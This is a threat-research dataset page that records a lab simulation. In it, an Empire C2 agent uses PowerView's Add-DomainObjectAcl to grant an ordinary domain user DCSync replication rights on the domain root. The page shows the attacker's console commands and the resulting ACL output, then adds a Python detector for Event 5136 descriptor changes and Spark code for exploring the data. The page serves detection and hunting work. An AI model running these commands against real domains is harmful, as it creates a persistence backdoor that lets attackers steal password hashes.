Empire Powerview Add-DomainObjectAcl

Metadata

Author: Roberto Rodriguez @Cyb3rWard0g
Creation Date: 2019/03/01
Modification Date: 2020/09/20
Tactics: ['TA0005']
Techniques: ['T1222.001']
Tags: ['AD Object Modification', 'AD Object nTSecurityDescriptor', 'LDAP ModifyRequest']

Dataset Description

This dataset represents an adversary with sufficient permissions (e.g. a domain admin) adding an access control entry (ACE) to the discretionary access control list (DACL) of an Active Directory object (here, the root domain object). One example is an adversary modifying the root domain DACL to allow a specific domain user, who is in no privileged groups and has no local admin rights on the domain controller itself, to use Active Directory replication services and obtain secret domain data (e.g. other users' NTLM hashes).
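The detection side of the description above, as an added example that is not part of the dataset, the Threat Hunter Playbook notebook or PowerView: when the domain object's DACL is written, a domain controller with Directory Service Changes auditing enabled records Security Event 5136 with AttributeLDAPDisplayName set to nTSecurityDescriptor and the new descriptor in SDDL form in AttributeValue (this event and its field names are assumed here; they do not appear in the sample of the dataset shown on this page). The block parses the DACL out of such an event and flags every access-allowed ACE that grants one of the three replication control-access rights (the GUIDs for DS-Replication-Get-Changes, -All and -In-Filtered-Set are well-known constants) to a trustee outside an assumed baseline of principals that normally hold them. The events, the SDDL strings and the baseline are constructed for the example; the SID ending in -1103 is the one from the PowerView output on this page, the one ending in -1104 is made up.

```python
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

# Control-access-right GUIDs that together let a principal pull directory data
# through the replication protocol (what Add-DomainObjectAcl -Rights DCSync grants).
REPLICATION_RIGHTS: Dict[str, str] = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Assumed baseline (SDDL aliases): Administrators, Domain Admins, Domain Controllers,
# Enterprise Domain Controllers, Enterprise Read-only DCs, Local System. Tune per domain.
BASELINE_TRUSTEES: Set[str] = {"BA", "DA", "DD", "ED", "RO", "SY"}

ADS_RIGHT_DS_CONTROL_ACCESS = 0x100  # the AccessMask 256 seen in the PowerView output

# One SDDL ACE: (ace_type;ace_flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\(([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^;()]*);([^()]*)\)")


@dataclass(frozen=True)
class Ace:
    ace_type: str
    rights: str
    object_guid: str
    trustee: str


def parse_dacl(sddl: str) -> List[Ace]:
    """Return the ACEs of the DACL (the 'D:' component) of an SDDL string."""
    start = sddl.find("D:")
    if start < 0:
        return []
    dacl = sddl[start + 2:]
    sacl = dacl.find("S:")  # an optional SACL follows the DACL
    if sacl >= 0:
        dacl = dacl[:sacl]
    return [Ace(t, r, g.lower(), s) for t, _flags, r, g, _ig, s in ACE_RE.findall(dacl)]


def grants_extended_right(rights: str) -> bool:
    """True if the rights field includes ADS_RIGHT_DS_CONTROL_ACCESS (SDDL token 'CR')."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & ADS_RIGHT_DS_CONTROL_ACCESS)
    return "CR" in {rights[i:i + 2] for i in range(0, len(rights), 2)}


def replication_grants(event: Dict[str, object],
                       baseline: Set[str] = BASELINE_TRUSTEES) -> List[Dict[str, str]]:
    """Findings for one Event 5136 that writes nTSecurityDescriptor: each access-allowed
    ACE granting a replication right to a trustee outside the baseline."""
    if event.get("EventID") != 5136 or event.get("AttributeLDAPDisplayName") != "nTSecurityDescriptor":
        return []
    findings = []
    for ace in parse_dacl(str(event.get("AttributeValue", ""))):
        if ace.ace_type not in ("A", "OA") or not grants_extended_right(ace.rights):
            continue  # deny/audit ACEs and ACEs without CR cannot grant replication
        if ace.object_guid == "":
            right = "all extended rights (no object type)"  # CR with no GUID covers replication too
        elif ace.object_guid in REPLICATION_RIGHTS:
            right = REPLICATION_RIGHTS[ace.object_guid]
        else:
            continue
        if ace.trustee in baseline:
            continue
        findings.append({"host": str(event.get("Hostname", "")), "object": str(event.get("ObjectDN", "")),
                         "trustee": ace.trustee, "right": right})
    return findings


def scan(events: Iterable[Dict[str, object]]) -> List[Dict[str, str]]:
    return [f for e in events for f in replication_grants(e)]


SID_1103 = "S-1-5-21-4228717743-1032521047-1810997296-1103"  # SID from the PowerView output above
DEFAULT_ACES = ("(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
                "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)"
                "(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)"
                "(A;;RPLCLORC;;;AU)")

# Constructed sample events; the shape follows the 5136 event fields but is assumed here.
SAMPLE_EVENTS = [
    {"EventID": 5136, "Hostname": "MORDORDC.theshire.local", "ObjectDN": "DC=theshire,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "AttributeValue": "O:BAG:BAD:AI" + DEFAULT_ACES
                       + "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;%s)" % SID_1103
                       + "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;%s)" % SID_1103
                       + "(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;%s)" % SID_1103},
    {"EventID": 5136, "Hostname": "MORDORDC.theshire.local", "ObjectDN": "DC=theshire,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "AttributeValue": "O:BAG:BAD:AI" + DEFAULT_ACES},  # benign rewrite of the defaults
    {"EventID": 5136, "Hostname": "MORDORDC.theshire.local", "ObjectDN": "DC=theshire,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "AttributeValue": "O:BAG:BAD:AI" + DEFAULT_ACES  # hex rights form, made-up SID -1104
                       + "(OA;;0x100;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-4228717743-1032521047-1810997296-1104)"},
    {"EventID": 5136, "Hostname": "MORDORDC.theshire.local", "ObjectDN": "CN=nmartha,CN=Users,DC=theshire,DC=local",
     "AttributeLDAPDisplayName": "description", "AttributeValue": "helpdesk"},  # other attribute, ignored
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f['host']}: {f['trustee']} granted {f['right']} on {f['object']}")
```

AccessMask 256 in the PowerView output is ADS_RIGHT_DS_CONTROL_ACCESS, the CR token in SDDL; an access-allowed ACE that carries CR with no object GUID grants every extended right, replication included, so the check treats that as a hit as well. The baseline set is the part that needs local tuning: a trustee outside it is reported, and the three resolved GUIDs in the PowerView output above are exactly the ones this check looks up.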

Notebooks

Notebooks created by the community leveraging the mordor datasets

Author                  Name                                        Link
Threat Hunter Playbook  Active Directory Replication User Backdoor  https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190101151110.html

Simulation Plan

Environment: https://github.com/OTRF/mordor-labs/tree/master/environments/windows/shire
Tool Type: C2
Module: powerview

Adversary View

(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
A7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            
HBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            
UF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            
8BUCWV1P ps 172.18.39.5     WORKSTATION5      *THESHIRE\pgustavo      powershell         2488   5/0.0    2020-09-21 17:09:43  http            

(Empire: agents) > interact 8BUCWV1P
(Empire: 8BUCWV1P) > scriptimport data/module_source/situational_awareness/network/powerview.ps1
[*] Tasked 8BUCWV1P to run TASK_SCRIPT_IMPORT
[*] Agent 8BUCWV1P tasked with task ID 1
(Empire: 8BUCWV1P) > 
script successfully saved in memory

(Empire: 8BUCWV1P) > scriptcmd Add-DomainObjectAcl -TargetIdentity "dc=theshire,dc=local" -TargetDomain theshire.local -PrincipalIdentity nmartha -Rights DCSync
[*] Tasked 8BUCWV1P to run TASK_SCRIPT_COMMAND
[*] Agent 8BUCWV1P tasked with task ID 2
(Empire: 8BUCWV1P) > 
Job started: 5WSPKL

(Empire: 8BUCWV1P) > scriptcmd $nmarthaSid = Get-DomainUser nmartha | Select-Object -ExpandProperty objectsid; Get-DomainObjectACL  "dc=theshire,dc=local" -Domain theshire.local -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $nmarthaSid}
[*] Tasked 8BUCWV1P to run TASK_SCRIPT_COMMAND
[*] Agent 8BUCWV1P tasked with task ID 3
(Empire: 8BUCWV1P) > 
Job started: YG1ZB3

AceQualifier           : AccessAllowed
ObjectDN               : DC=theshire,DC=local
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : DS-Replication-Get-Changes-In-Filtered-Set
ObjectSID              : S-1-5-21-4228717743-1032521047-1810997296
InheritanceFlags       : None
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-4228717743-1032521047-1810997296-1103
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : None
InheritedObjectAceType : All
OpaqueLength           : 0

AceQualifier           : AccessAllowed
ObjectDN               : DC=theshire,DC=local
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : DS-Replication-Get-Changes
ObjectSID              : S-1-5-21-4228717743-1032521047-1810997296
InheritanceFlags       : None
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-4228717743-1032521047-1810997296-1103
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : None
InheritedObjectAceType : All
OpaqueLength           : 0

AceQualifier           : AccessAllowed
ObjectDN               : DC=theshire,DC=local
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : DS-Replication-Get-Changes-All
ObjectSID              : S-1-5-21-4228717743-1032521047-1810997296
InheritanceFlags       : None
BinaryLength           : 56
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-5-21-4228717743-1032521047-1810997296-1103
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : None
InheritedObjectAceType : All
OpaqueLength           : 0

Explore Mordor Dataset

Initialize Analytics Engine

from openhunt.mordorutils import *
spark = get_spark()

Download & Process Mordor File

mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/defense_evasion/host/empire_powerview_ldap_ntsecuritydescriptor.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable 

Get to know your data

df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname                   |Channel                                 |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-PowerShell/Operational|4103   |2785 |
|WORKSTATION5.theshire.local|Windows PowerShell                      |800    |2771 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |806  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |10     |450  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |306  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |296  |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |12     |100  |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational    |13     |96   |
|WORKSTATION6.theshire.local|security                                |4658   |94   |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational    |7      |88   |
|WORKSTATION5.theshire.local|Security                                |4658   |76   |
|MORDORDC.theshire.local    |Security                                |5156   |76   |
|MORDORDC.theshire.local    |Security                                |4658   |70   |
|WORKSTATION5.theshire.local|Security                                |5158   |65   |
|WORKSTATION6.theshire.local|security                                |5158   |53   |
|WORKSTATION5.theshire.local|Security                                |5156   |52   |
|WORKSTATION6.theshire.local|security                                |4656   |47   |
|WORKSTATION6.theshire.local|security                                |4663   |47   |
|WORKSTATION6.theshire.local|security                                |4690   |47   |
|WORKSTATION6.theshire.local|security                                |4673   |43   |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows